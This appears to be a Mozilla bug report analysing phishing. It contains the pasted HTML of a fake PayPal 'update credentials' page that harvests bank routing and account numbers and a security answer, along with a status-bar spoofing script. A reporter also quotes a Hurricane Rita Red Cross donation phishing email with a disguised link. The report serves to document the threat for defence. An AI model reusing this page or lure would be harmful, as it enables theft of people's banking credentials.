src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="150"></td> <td class="topSpacer" width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td class="topSpacer" width="100%"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="1"></td> </tr> <tr><td colspan="3">The safety and security of your bank account information is protected by PayPal. We protect against unauthorized withdrawals and will notify you by email whenever you deposit or withdraw funds from this bank account.<br><br> </td></tr> </tbody></table></td></tr></tbody> </tbody></table></table> <FORM action="www.paypal.com" method="post" name="securityForm"><table class="formTable" align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td class="topSpacer" width="150"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="150"></td> <td class="topSpacer" width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td class="topSpacer" width="100%"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="1"></td> </tr> <tr> <td class="label"><label for="bank_acct_country_name">Country:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td>United States</td> </tr> <tr> <td class="label"><label for="bank_acct_bank_name">Bank Name:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td><input size="20" maxlength="64" name="bank_acct_bank_name" value="" type="text"></td> </tr> <tr> <td class="label"><label for="bank_acct_account_type">Account Type:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input checked="checked" name="bank_acct_account_type" value="checking" type="radio">Checking<br><input name="bank_acct_account_type" value="savings" type="radio">Savings</td> </tr> <tr> <td class="label"><label for="bank_acct_routing_number1">Routing Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <img src="UpDate-Credts_files/symbol_route.gif" alt="" border="0"><input size="20" maxlength="23" name="bank_acct_routing_number1" value="" type="text"><img src="UpDate-Credts_files/symbol_route.gif" alt="" border="0"><br>Is usually located between the <img src="UpDate-Credts_files/symbol_route.gif" alt="" border="0"> symbols on your check.</td> </tr> <tr> <td class="label"><label for="bank_acct_account_number">Account Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input size="20" maxlength="17" name="bank_acct_account_number" value="" type="text"><img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"><br>Typically comes before the <img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"> symbol. Its exact location and number of digits varies from bank to bank.</td> </tr> <tr> <td class="label"><label for="bank_acct_account_number">Re-enter Account Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input size="20" maxlength="17" name="bank_acct_retype_account_number" value="" type="text"><img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"> </td> </tr> </tbody></table> <br><table align="center" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><img src="UpDate-Credts_files/check_zoom_sm.gif" alt="" border="0"></td></tr></tbody></table> <table cellSpacing="0" cellPadding="0" border="0"> <tbody> <tr vAlign="top"> <td><img src="UpDate-Credts_files/secret.jpg" alt="" border="1"><br> <img height="1" src="http://www.paypal.com/images/pixel.gif" width="210" border="0"></td> <td><img height="1" src="http://www.paypal.com/images/pixel.gif" width="6" border="0"></td> <td><input id="string_answer" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; WIDTH: 215px; FONT-FAMILY: verdana,arial,helvetica,sans-serif" maxLength="8" size="12" name="string_answer"></td> </tr> </tbody> </table> <table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" class="verticalSpacerHigh" border="0" height="1" width="1"></td></tr> <tr><td class="separationLine"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="2" width="1"></td></tr> <tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" class="verticalSpacerMedium" border="0" height="1" width="1"></td></tr> </tbody></table> </tr><tr> <TD><SPAN class=small><SPAN class=emphasis>For your protection, we verify credit card and debit card billing addresses.</SPAN><BR>The process normally takes about 30 seconds, but it may take longer during certain times of the day. Please click the<SPAN class=emphasis> Confirm</SPAN> button to update your information. When your card has been successfully added, you will see a confirmation page.</SPAN></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD align=left> <SCRIPT language=JavaScript>function DisableAndSubmitVar (whichform,submitVar) { ua = new String(navigator.userAgent); if (ua.match(/IE/g)) { for (i=1; i <whichform.elements.length; i++) { if (whichform.elements[i].type == 'submit') { whichform.elements[i].disabled = true; } } var input = document.createElement('INPUT'); input.style.display = 'none'; input.name = submitVar; input.value = '1'; whichform.appendChild(input); } whichform.submit(); } </SCRIPT> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD><IMG class=verticalSpacerHigh height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=separationLine><IMG height=2 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD><IMG class=verticalSpacerMedium height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD class=globalButtons align=right width="100%"><input name=cancel_add.x onclick="return check_all(this.form);" type=submit value="confirm"> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD> <TD width=20><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=20 border=0></TD> <TD vAlign=top width=120><A href="https://www.paypalcreditcard.com/paypalbanner?banner_id=paypal/web/11&paypal_id=03B7378DDFA23AC484499BDA3343D5E2"><IMG height=600 alt="" src="UpDate-Credts_files/bnr_PVNbnr3_120x600.gif" width=120 align=top border=0></A></TD></TR> <TR> <TD colSpan=3><IMG height=5 alt="" src="UpDate-Credts_files/pixelPIN.gif" width=1 border=0></TD></TR></TBODY></TABLE></FORM></TD></TR></TBODY></TABLE></DIV> <DIV id=xptFooter> <TABLE cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD> <P><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/mobile">Mobile | </A><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/batch">Mass Pay</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_upgrade-interest-marcom">Money Market</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_dc-intro">ATM/Debit Card</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_pay-bill">BillPay</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb">Referrals</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/about">About Us</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/accounts">Account Types</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees">Fees</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy">Privacy</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_bc-signup">Buyer Credit</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Center</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">Contact Us</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua">User Agreement</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_pdn-intro">Developers</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_shop">Shops</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-pie-available">Gift Certificates/Points</A></P> <P><A class=ebayLink href="http://www.ebay.com/" target=_blank>PayPal, an eBay company</A></P> <P class=lastPara>Copyright © 1999-2005 PayPal. All rights reserved.<BR><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/fdic">Information about FDIC pass-through insurance</A><BR></P></TD></TR></TBODY></TABLE><BR></DIV></DIV></BODY></HTML> </form> </form> <SCRIPT type=text/javascript></SCRIPT> <SCRIPT language=JavaScript src="" type=text/javascript> <script src="verify/pp_main.js"></SCRIPT> <SCRIPT> <!-- Hide from old browsers // All you have to do is put another text in the variable message. // Don't forget to break all lines with a ^ // When you do not place a ^ at the end of all the message, the // message will not repeat message = "https://www.paypal.com/" scrollSpeed = 12 lineDelay = 6000000000000000000 // Do not change the text below // txt = "" function scrollText(pos) { if (message.charAt(pos) != '^') { txt = txt + message.charAt(pos) status = txt pauze = scrollSpeed } else { pauze = lineDelay txt = "" if (pos == message.length-1) pos = -1 } pos++ setTimeout("scrollText('"+pos+"')",pauze) } // Unhide --> scrollText(0) </SCRIPT>
Updated•19 years ago
|
Summary: phishing site content analysis → phishing site content analysis
Reporter | ||
Comment 1•19 years ago
|
||
e-mail to start the phish... Hurricane Rita Relief Thank you for contributing to the Hurricane Rita Relief operation. To reduce donor wait times caused by high volume, the American Red Cross has partnered with Microsoft and MSN to help handle donation processing. Less than a month after Katrina, Hurricane Rita is now churning towards the Gulf coast. The Red Cross has opened shelters and pre-positioned staff and supplies - we're ready to respond. Your financial gift to Hurricane Rita relief efforts will help the Red Cross provide shelter, food, counseling and other assistance to those affected by this hurricane. Click here to make a donation. https://give.redcross.org/donation-form.asp which points at http://www.directcomputersystems.co.uk/pub/redcross/index.htm
Reporter | ||
Comment 2•19 years ago
|
||
Reporter | ||
Comment 3•19 years ago
|
||
note the verisign link on the page where the redirect landed. this one even spoofs the user into thinking the site belongs to the red cross... https://digitalid.verisign.com/as2/85f8777e6ab9f73e87366e9f0d61168b
Comment 4•12 years ago
|
||
Chris Hofmann: Is this bug report still useful in any way (if so, please elaborate how) or can this be closed?
Reporter | ||
Comment 5•12 years ago
|
||
incomplete
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → INCOMPLETE
You need to log in
before you can comment on or make changes to this bug.
Description
•